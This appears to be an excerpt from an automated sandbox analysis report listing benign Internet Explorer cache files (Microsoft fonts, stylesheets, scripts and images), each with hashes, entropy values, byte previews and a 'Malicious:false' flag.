                                                                                                                                                                                                  SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                                                                                                                                  SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: @charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mwfmdl2-v3.54[1].woff
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26288
                                                                                                                                                                                                  Entropy (8bit):7.984195877171481
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                                                                                                                  MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                                                                                                                  SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                                                                                                                  SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                                                                                                                  SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\otFlat[1].json
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12588
                                                                                                                                                                                                  Entropy (8bit):5.376121346695897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
                                                                                                                                                                                                  MD5:AF6480CC2AD894E536028F3FDB3633D7
                                                                                                                                                                                                  SHA1:EA42290413E2E9E0B2647284C4BC03742C9F9048
                                                                                                                                                                                                  SHA-256:CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
                                                                                                                                                                                                  SHA-512:A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\41-0bee62-68ddb2ab[1].js
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1238
                                                                                                                                                                                                  Entropy (8bit):5.066474690445609
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                  MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                  SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                  SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                  SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\4996b9[1].woff
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):45633
                                                                                                                                                                                                  Entropy (8bit):6.523183274214988
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                  MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                  SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                  SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                  SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\755f86[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):390
                                                                                                                                                                                                  Entropy (8bit):7.173321974089694
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZ/SlkR7+RGjVjKM4H56b6z69eG3AXGxQm+cISwADBOwIaqOTp:6v/71IkR7ZjKHHIr8GxQJcISwy0W9
                                                                                                                                                                                                  MD5:D43625E0C97B3D1E78B90C664EF38AC7
                                                                                                                                                                                                  SHA1:27807FBFB316CF79C4293DF6BC3B3DE7F3CFC896
                                                                                                                                                                                                  SHA-256:EF651D3C65005CEE34513EBD2CD420B16D45F2611E9818738FDEBF33D1DA7246
                                                                                                                                                                                                  SHA-512:F2D153F11DC523E5F031B9AA16AA0AB1CCA8BB7267E8BF4FFECFBA333E1F42A044654762404AA135BD50BC7C01826AFA9B7B6F28C24FD797C4F609823FA457B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR..............w=....MIDATH.c...?.6`hhx.......??........g.&hbb....... .R.R.K...x<..w..#!......O ....C..F___x2.....?...y..srr2...1011102.F.(.......Wp1qqq...6mbD..H....=.bt.....,.>}b.....r9........0.../_.DQ....Fj..m....e.2{..+..t~*...z.Els..NK.Z.............e....OJ.... |..UF.>8[....=...;/.............0.....v...n.bd....9.<.Z.t0......T..A...&....[......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\7d-3b8b80[1].css
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):168619
                                                                                                                                                                                                  Entropy (8bit):5.044040083782762
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:OzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCx8:clZAXLkeeds
                                                                                                                                                                                                  MD5:7A091EA3F595695C19CED8B52228FF48
                                                                                                                                                                                                  SHA1:587B8C1FFF5C84755C8BE6C2029FC0B46C0F76B3
                                                                                                                                                                                                  SHA-256:C55B3700FA0698B9F057F40512CFD3B9D6AED620598BACE734338F4F6DAF7A86
                                                                                                                                                                                                  SHA-512:522DC920EDA85D8C7F6FA56E959552C477133E1C5C39939331962A221E5C5AEAEC0643FE8F6AFF4384125B4B58E3930751A21CEB7C60C309AD037ED12865AF8C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\AAzb5EX[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):371
                                                                                                                                                                                                  Entropy (8bit):6.987382361676928
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPkR/ikU2KG4Lph60GGHyY6Gkcz6SpBUSrwJuv84ipEuPJT+p:6v/78/Y2K7m0GGSXEBUQZkRbPBs
                                                                                                                                                                                                  MD5:13B47B2824B7DE9DC67FD36A22E92BBE
                                                                                                                                                                                                  SHA1:5118862BA67A32F8F9E2723408CF5FAF59A3282C
                                                                                                                                                                                                  SHA-256:9DB94F939C16B001228CA30AF19C108F05C4F1A9306ECC351810B18C57F271D4
                                                                                                                                                                                                  SHA-512:001A4A6E1B08B32C713D7878E00E37BF061DCFC34127885FB300478E929BC7A8FF59D426FE05183C0DDA605E8EF09C4E4769A038787838CC8A724B3233145C6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...#...#.x.?v....IDAT8O.1N.A.E.x....J...!..J.....Ctp....;."..HI...@...xa.Q...W...o..'.o{.....\.Y.l...........O..7.;H....*..pR..3.x6.........lb3!..J8/.e....F...&.x..O2.;..$b../.H}AO..<)....p$...eoa<l9,3.a....D..?..F..H...eh......[........ja.i.!.........Z.V....R.A..Z..x.s....`...n..E......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB14hq0P[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14112
                                                                                                                                                                                                  Entropy (8bit):7.839364256084609
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7EIqipbU3NAAJ8QVoqHDzjEfE7Td4Tb67Bx/J5e8H0V1HB:7EIqZT5DMQT+TEf590VT
                                                                                                                                                                                                  MD5:A654465EC3B994F316791CAFDE3F7E9C
                                                                                                                                                                                                  SHA1:694A7D7E3200C3B1521F5469A3D20049EE5B6765
                                                                                                                                                                                                  SHA-256:2A10D6E97830278A13CD51CA51EC01880CE8C44C4A69A027768218934690B102
                                                                                                                                                                                                  SHA-512:9D12A0F8D9844F7933AA2099E8C3D470AD5609E6542EC1825C7EEB64442E0CD47CDEE15810B23A9016C4CEB51B40594C5D54E47A092052CC5E3B3D7C52E9D607
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..ii(....(.h........Z(....JZ.)i(....(.......(.......(....J...+h...@....+...e.9...V..'."!.@....|......n...@My..w9;.5I...@....L..k...w2.'...M8)4..>.u9..5U.w9,M(....!E..!.[.5<v.?AV..s...VS....E5v........Q.^jwp*3&MJrf..J..|p...n .j..qW#.5w.)&.&..E^..*..."..T.......y.U.4.IK.sK.ooj.....Z..3j...".)..c..~... .RqL...lcym..R..gTa..a9.+....5-.W'.T@.N.8"...f.:....J.6.r.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB17milU[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):627
                                                                                                                                                                                                  Entropy (8bit):7.4822519699232695
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/W/6TiIP7X0TFI8uqNN9pEsGCLDOk32Se5R2bBCEYPk79kje77N:U/6xPT0TtNNDGCLDOMVe5JEAkv3N
                                                                                                                                                                                                  MD5:DDE867EA1D9D8587449D8FA9CBA6CB71
                                                                                                                                                                                                  SHA1:1A8B95E13686068DD73FDCDD8D9B48C640A310C4
                                                                                                                                                                                                  SHA-256:3D5AD319A63BCC4CD963BDDCF0E6A629A40CC45A9FB14DEFBB3F85A17FCC20B2
                                                                                                                                                                                                  SHA-512:83E4858E9B90B4214CDA0478C7A413123402AD53C1539F101A094B24C529FB9BFF279EEFC170DA2F1EE687FEF1BC97714A26F30719F271F12B8A5FA401732847
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.KTQ...yj..tTZ..VA.r.B*A.rYA.FY...V..""*(.Jh.E -,..j......?.z..{:...8.....{s....q.A. HS....x>......Rp.<.B.&....b...TT....@..x....8.t..c.q.q.].d.'v.G...8.c.[..ex.vg......x}..A7G...R.H..T...g.~..............0....H~,.2y...)...G..0tk..{.."f~h.G..#?2......}]4/..54...]6A. Iik...x-T.;u..5h._+.j.....{.e.,........#....;...Q>w...!.....A..t<../>...s.....ha...g.|Y...9[.....:..........1....c.:.7l....|._.o..H.Woh."dW..).D.&O1.XZ"I......y.5..>..j..7..z..3....M|..W...2....q.8.3.......~}89........G.+.......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1beuy8[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6278
                                                                                                                                                                                                  Entropy (8bit):7.918331485304755
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:BGEEjO8hIuN6Rz6iGx0xf8EqjfmlFi8Xc5uDI7Hb3NIlpKhqGChlDXeC:BFq6u0V6ExzqDWtXc5uyHb3NLBQeC
                                                                                                                                                                                                  MD5:3340A5E767DB91717973F3BA28861FF5
                                                                                                                                                                                                  SHA1:CFB973C1F9F1E0FF146F18A7132C0DDF338D493A
                                                                                                                                                                                                  SHA-256:41343A208079CC5E2048BA7691774D9FF46AD1A45FBFBE41AF64161A45C35B8C
                                                                                                                                                                                                  SHA-512:7F3EA940518600E2C5AFADC043D2B71839C4F46AB2475679D8E1448014164FBF3171F5027B1C139560F628CAAEBA3FEF5368FE25452F765CC3DBC55DC6BF525B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E%(..R.S..J.Bp.4...61U.\.s...i..5.V.1.,..m..S.c.C.?3~f.8f..>...vt...8.:.B..j.c.Tf..N.bG;[.*..... ..p=..`22:.Rlh....Z...c..U.xld.......hL$..2[...!...z.....ASQ.,....*.3@..a. ...3.Q.[..8Z..y....'.J3.....n.QP.V...q.J..uF#....Shd ..*F.QE.-.......SHi.R.JQ@.E....!..4...i.i..h..T":(....I.<.$.....=......jM.i]...:..Gg..SQ..Q..P...<.(...&t..P..9.N..K...q.Y..D.!8...T..l
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1biY4X[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1656
                                                                                                                                                                                                  Entropy (8bit):7.725881374397948
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xGpuERAvfho/2p/FrftQ9ZOv8R0npyqmc:xGAEehoup/FrdER0EqP
                                                                                                                                                                                                  MD5:3FE60606B1288D32CA262B9987428E34
                                                                                                                                                                                                  SHA1:A43DD0A11BB23568DE1E38C34841611AA4B90347
                                                                                                                                                                                                  SHA-256:A63570C83F18FD5F0A5F17B71FD24762B6AD605A2E053C0B15180C4E1EE91742
                                                                                                                                                                                                  SHA-512:615B7500B168D1B20C30655565E82D258FCC31AA05D5416887B4DE941AF91616C3074A722466445C69D714039B882FC04A3EE1C56A8735C0BEF9FD96ABDA7734
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..[.[..i....w&.I...h.E.....W}/.E.....5.uz.....A.PiZ.....X..X.f.[...y.j...'........wg=*...."..w'...ERiI4S...Q.&1Etr..f8.iv.L....w.M).psA9..es#..^.Q...PH..A.~..k-j...[...H?.].c...|.G;..$.}m..X..#..J.u...%.N.=za....NA..;P.P..y..yMs.pyv..r..:.;.......W8u...hK]L'......(V@.r.d.c....9..n...EW s...g...T..i...Rc.FkFi.m.Z..i6c.W8.J.[S...@.pz...2n...P3....F.p.......
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bkQKt[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26179
                                                                                                                                                                                                  Entropy (8bit):7.958261896510986
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7V7s2sZha7THLmEUNHZ7B1IDxi/M4nTxyGHWTJOFX:7V/QmJUNHZ7BqDEpTxTX
                                                                                                                                                                                                  MD5:99B758CAEF5631FCDCDFA29FB91CEB40
                                                                                                                                                                                                  SHA1:313948AAA2328ED8A4C90D366B80A21CC54FD33F
                                                                                                                                                                                                  SHA-256:F276B806C99C3671596949D0FFBA3BB7D2D63ECE35033AE8EBAB808F7471C4A1
                                                                                                                                                                                                  SHA-512:7E64E2A8E22586D478524A26A14B89DA8095EAFAE56BB559DB7E273D7E4511BEF579FE1C226CFA0DC913D4CE80CB1F788499E9184A0430F7B8EF69F272E92120
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..............J)qE..b..R.(....b.Z(...R...Z(.1KE..(.....QKF(.....LQ.Z(.....P..(...)qF(.(........P.QK.1@.E-...R.@.IKE.%(.....[H...<*...IE]...;!/o..FWt..Pw..dr.i.4....^..A.i..~...j...e/.nO..J.jNU..R..h.h-binn.y....{.NVU..#.......d.Iq+<.H\b..\.|...4.O.n}..t.~f.3.n....X......0X...:.^k"[.e../`;{.#...l..F....."{.....}o.n...c..q.t..C.wl6#,k.9.E..,9n..ff.....R.W;F...E.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BB1bkSQQ[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8706
                                                                                                                                                                                                  Entropy (8bit):7.934695805049456
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BFNpU2zCOzgZyJ1eYQZtww06h1keF0VPBw45leb6uxYj:vnU8xkZyTxCtwCnkPBxly6uxC
                                                                                                                                                                                                  MD5:2885FFEB0E1ABA21B0112371E67B9330
                                                                                                                                                                                                  SHA1:A195BDD6B589D1F278DA61DED131704C9E25BA1B
                                                                                                                                                                                                  SHA-256:DFE9A20C66239C1CE3A619011F5F836EF96A8CAD78CC6005B7FE59DAFB43F807
                                                                                                                                                                                                  SHA-512:07BFDC1320942BA5C8E4C32C80B22725BDC34E6155AB31242802E9585F5986C6A1BB6D32F66953C44EA0B5AF2DB866402D728ABF8B4C4A4860F0E15BC97E619B
                                                                                                                                                                                                  Malicious:false
